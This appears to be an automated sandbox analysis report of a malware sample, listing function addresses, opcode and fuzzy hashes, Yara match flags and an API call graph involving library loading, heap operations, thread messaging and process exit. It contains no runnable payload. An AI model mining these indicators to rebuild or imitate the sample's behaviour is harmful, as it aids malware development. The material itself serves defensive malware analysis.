                                                              • Instruction Fuzzy Hash: 37210871904204DFDB06DF95D9C0B57BB65FB84314F21C17AD9090B3A6C336E45ACAA2
                                                              Function 0141D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383242786.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_141d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90a23c87c92975a6de475591029826dafef869002b236af91f735d23badf38ac
                                                              • Instruction ID: ea146679a9fa50d4a7263e838dac37a85b9b92ae568d8cb6e243bcceaf8fdc36
                                                              • Opcode Fuzzy Hash: 90a23c87c92975a6de475591029826dafef869002b236af91f735d23badf38ac
                                                              • Instruction Fuzzy Hash: 262149B1904300DFDB05DF94D9C8B66BBA1FB84324F20C66ED8194B36AC336D446CB61
                                                              Function 0141D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383242786.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_141d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 303f7efa4bf0f852fc5056f5266d22ecf04ce2c5adc6966f89cddcd34cf985e4
                                                              • Instruction ID: 50a656290daf8dd7fcc8946be5c505052cd1c3ad4a787d719357e56f1aa7e143
                                                              • Opcode Fuzzy Hash: 303f7efa4bf0f852fc5056f5266d22ecf04ce2c5adc6966f89cddcd34cf985e4
                                                              • Instruction Fuzzy Hash: 5E2125F5A04300DFDB15DF54D988B16BF61EB84318F20C56ED80A0B36AC336D447CA62
                                                              Function 0141D006 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383242786.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_141d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e4e8e8330175f3852d49d0b06b9b0be00dc4b324f15b0d1d3440d5a535a5613
                                                              • Instruction ID: f6ca3ccc37f868ab5d58719349ad583a4f84b0380f7824abab84a4af4e75aa42
                                                              • Opcode Fuzzy Hash: 1e4e8e8330175f3852d49d0b06b9b0be00dc4b324f15b0d1d3440d5a535a5613
                                                              • Instruction Fuzzy Hash: 182195B55093808FD707CF24D594716BF71EB46214F28C5DBD8498F667C33A984ACB62
                                                              Function 0140D3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383208051.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                              • Instruction ID: f6331517828b99f5f27d1f8cddf5865f0c22429e170ecf3bd10c7d7114006558
                                                              • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                              • Instruction Fuzzy Hash: 9011CD72804240CFCB02CF84D9C4B56BF61FB84324F2482BAD8090A667C33AE45ACBA1
                                                              Function 0140D4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383208051.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                              • Instruction ID: 520426f1e2b9279f35da95fc0615ff9c710a778ff12a9baaafd3e87469bb2f60
                                                              • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                              • Instruction Fuzzy Hash: 0B119076904240CFCB16CF54D5C4B16BF61FB84314F2485AADC450B666C336D45ACB91
                                                              Function 0141D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383242786.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_141d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                              • Instruction ID: 917e9501219acf232df8397fa8da40fbb8dcb6a9d15b03f60f490cb8b95bf642
                                                              • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                              • Instruction Fuzzy Hash: 4F11BEB5944280DFCB02CF54C5C4B56BBA1FB84324F24C6AAD8494B766C33AD44ACB51
                                                              Function 0140D759 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383208051.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 042d5653796b00e491f2089ca1894f9e264487fc9a3ddaed539e16cbcafbbe0c
                                                              • Instruction ID: 24159bb75757be889311a668475d01e1e33fbe79e22e681b18a05e7c579b1b57
                                                              • Opcode Fuzzy Hash: 042d5653796b00e491f2089ca1894f9e264487fc9a3ddaed539e16cbcafbbe0c
                                                              • Instruction Fuzzy Hash: 950184314083849BE7254AE6DC84B67FB98DF41620F18C42BED094B2D6C6799848CA72
                                                              Function 0140D758 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1383208051.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140d000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ee775e1bf40542bfb64febcbbc3c4a34581300e8abaabe6a52c010824e977c7
                                                              • Instruction ID: 3e02f06e917ea74ecd39d8168f702e699fd9a716341d8e089814130840473f07
                                                              • Opcode Fuzzy Hash: 5ee775e1bf40542bfb64febcbbc3c4a34581300e8abaabe6a52c010824e977c7
                                                              • Instruction Fuzzy Hash: BDF04F714043849EE7258A5AD884BA3FFA8EF51634F18C46AED484B296C2799844CAB1

                                                              Non-executed Functions

                                                              Function 07229618 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65b0ab90c89fb96935717d10bf9aa8a16ecccc6b3b82969beafa67be4c299c00
                                                              • Instruction ID: 3834371f19f166edccf7a0d2065bc78d5e1b6762ce3fd633b09e4d4c5fd6cb6d
                                                              • Opcode Fuzzy Hash: 65b0ab90c89fb96935717d10bf9aa8a16ecccc6b3b82969beafa67be4c299c00
                                                              • Instruction Fuzzy Hash: D0E11BB4E102199FDB14CFA8C5809AEBBB2FF49301F24816AD454BB355D734AD82CF61
                                                              Function 0722B5C8 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e71077952b40dea6f79640924624a9b75298dd799db16b76a01ed8055d4714f
                                                              • Instruction ID: f5ff0ceed903605f935938d34705edb63e9ec0606172673a74558b619cb12ec0
                                                              • Opcode Fuzzy Hash: 0e71077952b40dea6f79640924624a9b75298dd799db16b76a01ed8055d4714f
                                                              • Instruction Fuzzy Hash: F9E12CB4E102199FDB14CFA9C5809AEFBB2FF49305F24816AD418AB355DB34AD42CF61
                                                              Function 072291E0 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 237bce61e47398f8f2b11d4ba2cfb387103b7667f5e3ebfd157f53a96bff5132
                                                              • Instruction ID: 8422a0df14c7993f614ea11fdc2cc4a50ecf0bb144c4b69238a0489fe8232712
                                                              • Opcode Fuzzy Hash: 237bce61e47398f8f2b11d4ba2cfb387103b7667f5e3ebfd157f53a96bff5132
                                                              • Instruction Fuzzy Hash: 3CE118B4E102199FDB14CFA9C580AAEBBB2FF49305F24816AD454B7355CB34AD82CF61
                                                              Function 07220559 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7e74128407ec70121d88c8b467e91a54523886bcd6d93cbb9e0ba362e50a1a4
                                                              • Instruction ID: 6db008d97a0d1843525e4272ad9a6193783679994ae3b8d4f06dc7e4ba654e74
                                                              • Opcode Fuzzy Hash: d7e74128407ec70121d88c8b467e91a54523886bcd6d93cbb9e0ba362e50a1a4
                                                              • Instruction Fuzzy Hash: 21D1E37582065A8ACB11EFB4D8506D9B771FF99300F10C79AD0093B621EF74AAD5CF91
                                                              Function 07220560 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ce85db76f5b836f36914382ca2a5e03414e46d3dc1e0133f90016f40f47bdac
                                                              • Instruction ID: 5d8011fa5f0ee9114efc6aa0880f0995e0accf7efade153c9331e514261d36b0
                                                              • Opcode Fuzzy Hash: 4ce85db76f5b836f36914382ca2a5e03414e46d3dc1e0133f90016f40f47bdac
                                                              • Instruction Fuzzy Hash: F1D1F37582065A8ACB11EFB4D850699F7B1FF99300F10C7AAD0093B621EF74AAD5CF91
                                                              Function 02DBD344 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00c97f71f66e8932b2cbb0dd3df5028751e6dc21f51fc1f91716debb3647a294
                                                              • Instruction ID: 1bf34e4dae9ad7f4fe4a72f8858389cf4c42fcf51166920c8e8f093858ddc3f9
                                                              • Opcode Fuzzy Hash: 00c97f71f66e8932b2cbb0dd3df5028751e6dc21f51fc1f91716debb3647a294
                                                              • Instruction Fuzzy Hash: 42A12736A00209CFCF06DFB4C8509DEB7B2FF85304B25856AE906AB761DB719D56CB50
                                                              Function 07229609 Relevance: .1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa6c1b4d58e5eb1ea927182321e19af9eac987895e2e715e4f5fba9723513a2e
                                                              • Instruction ID: 136b6b1e3a8aa922b16bf674c51bc2511b991e746cb74cf38ad43b6062fc656b
                                                              • Opcode Fuzzy Hash: fa6c1b4d58e5eb1ea927182321e19af9eac987895e2e715e4f5fba9723513a2e
                                                              • Instruction Fuzzy Hash: 2E5118B0E102298FDB14DFA9C9405AEFBF2BF89301F24816AD458B7255D735AD42CFA1
                                                              Function 07310007 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391182832.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7310000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86f06214799dae686bcc59f22bd66cd5594c42dda83aa6d0e18ce790ae5a1fc0
                                                              • Instruction ID: ca5b6fcf98e96460d316a0bf21b5fe23599ed23b6dbac4653d05742204702314
                                                              • Opcode Fuzzy Hash: 86f06214799dae686bcc59f22bd66cd5594c42dda83aa6d0e18ce790ae5a1fc0
                                                              • Instruction Fuzzy Hash: E0F07FA104E3D28FD3478BB448251A27FB2AE1315835F41EBD0C5CF4B3E25D4A5AD762

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:5.1%
                                                              Signature Coverage:8%
                                                              Total number of Nodes:137
                                                              Total number of Limit Nodes:11
                                                              execution_graph 92945 42fa63 92946 42fa73 92945->92946 92947 42fa79 92945->92947 92950 42eaa3 92947->92950 92949 42fa9f 92953 42cc63 92950->92953 92952 42eabb 92952->92949 92954 42cc7d 92953->92954 92955 42cc8b RtlAllocateHeap 92954->92955 92955->92952 92956 4250a3 92958 4250bc 92956->92958 92957 425104 92964 42e9c3 92957->92964 92958->92957 92961 425144 92958->92961 92963 425149 92958->92963 92962 42e9c3 RtlFreeHeap 92961->92962 92962->92963 92967 42cca3 92964->92967 92966 425114 92968 42ccbd 92967->92968 92969 42cccb RtlFreeHeap 92968->92969 92969->92966 93057 424d13 93058 424d2f 93057->93058 93059 424d57 93058->93059 93060 424d6b 93058->93060 93061 42c953 NtClose 93059->93061 93062 42c953 NtClose 93060->93062 93063 424d60 93061->93063 93064 424d74 93062->93064 93067 42eae3 RtlAllocateHeap 93064->93067 93066 424d7f 93067->93066 93068 42bfb3 93069 42bfcd 93068->93069 93072 11d2df0 LdrInitializeThunk 93069->93072 93070 42bff2 93072->93070 93073 41b653 93074 41b697 93073->93074 93075 41b6b8 93074->93075 93076 42c953 NtClose 93074->93076 93076->93075 93077 41a8f3 93078 41a962 93077->93078 93079 41a90b 93077->93079 93079->93078 93081 41e833 93079->93081 93082 41e859 93081->93082 93086 41e94d 93082->93086 93087 42fb93 93082->93087 93084 41e8eb 93085 42c003 LdrInitializeThunk 93084->93085 93084->93086 93085->93086 93086->93078 93088 42fb03 93087->93088 93089 42fb60 93088->93089 93090 42eaa3 RtlAllocateHeap 93088->93090 93089->93084 93091 42fb3d 93090->93091 93092 42e9c3 RtlFreeHeap 93091->93092 93092->93089 93093 4143b3 93094 4143cd 93093->93094 93099 417b63 93094->93099 93096 4143e8 93097 41441c PostThreadMessageW 93096->93097 93098 41442d 93096->93098 93097->93098 93100 417b87 93099->93100 93101 417b8e 93100->93101 93102 417bca LdrLoadDll 93100->93102 93101->93096 93102->93101 93103 4190f8 93104 42c953 NtClose 93103->93104 93105 419102 93104->93105 92970 40192a 92972 40192e 92970->92972 92971 40198b 92972->92971 92975 42ff33 92972->92975 92978 42e573 92975->92978 92979 42e599 92978->92979 92990 407403 92979->92990 92981 42e5af 92982 401a50 92981->92982 92993 41b463 92981->92993 92984 42e5ce 92985 42e5e3 92984->92985 93008 42cce3 92984->93008 93004 428563 92985->93004 92988 42e5fd 92989 42cce3 ExitProcess 92988->92989 92989->92982 93011 416823 92990->93011 92992 407410 92992->92981 92994 41b48f 92993->92994 93029 41b353 92994->93029 92997 41b4d4 92999 41b4f0 92997->92999 93002 42c953 NtClose 92997->93002 92998 41b4bc 93000 41b4c7 92998->93000 93035 42c953 92998->93035 92999->92984 93000->92984 93003 41b4e6 93002->93003 93003->92984 93005 4285c5 93004->93005 93007 4285d2 93005->93007 93043 4189c3 93005->93043 93007->92988 93009 42cd00 93008->93009 93010 42cd11 ExitProcess 93009->93010 93010->92985 93012 416840 93011->93012 93014 416853 93012->93014 93015 42d393 93012->93015 93014->92992 93016 42d3ad 93015->93016 93017 42d3dc 93016->93017 93022 42c003 93016->93022 93017->93014 93020 42e9c3 RtlFreeHeap 93021 42d452 93020->93021 93021->93014 93023 42c01d 93022->93023 93026 11d2c0a 93023->93026 93024 42c046 93024->93020 93027 11d2c1f LdrInitializeThunk 93026->93027 93028 11d2c11 93026->93028 93027->93024 93028->93024 93030 41b36d 93029->93030 93034 41b449 93029->93034 93038 42c093 93030->93038 93033 42c953 NtClose 93033->93034 93034->92997 93034->92998 93036 42c96d 93035->93036 93037 42c97b NtClose 93036->93037 93037->93000 93039 42c0b0 93038->93039 93042 11d35c0 LdrInitializeThunk 93039->93042 93040 41b43d 93040->93033 93042->93040 93044 4189ed 93043->93044 93050 418edb 93044->93050 93051 414033 93044->93051 93046 418b0e 93047 42e9c3 RtlFreeHeap 93046->93047 93046->93050 93048 418b26 93047->93048 93049 42cce3 ExitProcess 93048->93049 93048->93050 93049->93050 93050->93007 93055 414050 93051->93055 93053 4140ac 93053->93046 93054 4140b6 93054->93046 93055->93054 93056 41b773 RtlFreeHeap LdrInitializeThunk 93055->93056 93056->93053 93106 11d2b60 LdrInitializeThunk 93107 413ebc 93108 413ed0 93107->93108 93109 413e64 93107->93109 93112 42cbd3 93109->93112 93113 42cbed 93112->93113 93116 11d2c70 LdrInitializeThunk 93113->93116 93114 413e75 93116->93114

                                                              Executed Functions

                                                              Function 00417B63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95
                                                              Function 0042C953 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                              • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                              • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                              • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
                                                              Function 011D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d28911e2aaec485c03b0151e8d7025721e23b402be83499fe329dda49379d7b8
                                                              • Instruction ID: ad97bcbc423fbe346f6c2a1cd1c4107d99e277617f225f54eed50ae427f21ece
                                                              • Opcode Fuzzy Hash: d28911e2aaec485c03b0151e8d7025721e23b402be83499fe329dda49379d7b8
                                                              • Instruction Fuzzy Hash: 3690026120280003410D71984518616404A97E0201B55C021E1015590DC62589916225
                                                              Function 011D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 985c94fb4e0b50958ced7f9b9ad21e09fb85674ad6d8d3939c4f3b8df4db3423
                                                              • Instruction ID: d1a2d3669036475c619aaedbb9f0455583f005ce691143cae0651f12c665a9d6
                                                              • Opcode Fuzzy Hash: 985c94fb4e0b50958ced7f9b9ad21e09fb85674ad6d8d3939c4f3b8df4db3423
                                                              • Instruction Fuzzy Hash: C590023120180413D11971984608707004997D0241F95C412A0425558DD7568A52A221
                                                              Function 011D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a542099d25ca4e919d9828d96e990c5836164380cf3e6a2eff400d1e8a37bb0b
                                                              • Instruction ID: 569414227ecd358478e3ed26e8c01705b65852b75e9b9e6063b38200fd4102de
                                                              • Opcode Fuzzy Hash: a542099d25ca4e919d9828d96e990c5836164380cf3e6a2eff400d1e8a37bb0b
                                                              • Instruction Fuzzy Hash: 7B90023120188802D1187198850874A004597D0301F59C411A4425658DC79589917221
                                                              Function 011D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: dabd0896928102709e9b611ad446ecc84d65f558d8acba20e00cde44b7ed3e00
                                                              • Instruction ID: 089e06eb59ff7203f9bd760433d94ae3d300811566632b34b0927cef056f76fd
                                                              • Opcode Fuzzy Hash: dabd0896928102709e9b611ad446ecc84d65f558d8acba20e00cde44b7ed3e00
                                                              • Instruction Fuzzy Hash: B890023160590402D10871984618706104597D0201F65C411A0425568DC7958A5166A2
                                                              Function 00414320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                              • Instruction ID: c654e7dd82306ad07be20f2182398129074d27dccdf197e7b8b500296daea260
                                                              • Opcode Fuzzy Hash: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                              • Instruction Fuzzy Hash: 6A21F972E4421C7EEB01AE959C82DEF7B7CEF40798B40816AF904A7241D6389E1687E5
                                                              Function 004143A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                              • Instruction ID: 934fb77fa0409c7874f7a2f8fe5ac0ceccbab11669475182c5f65d5113228a07
                                                              • Opcode Fuzzy Hash: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                              • Instruction Fuzzy Hash: 1D1108B1D4021C7AEB10ABE19CC1DEF7B7CDF41798F408069FA04B7200D6785E068BA5
                                                              Function 004143B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
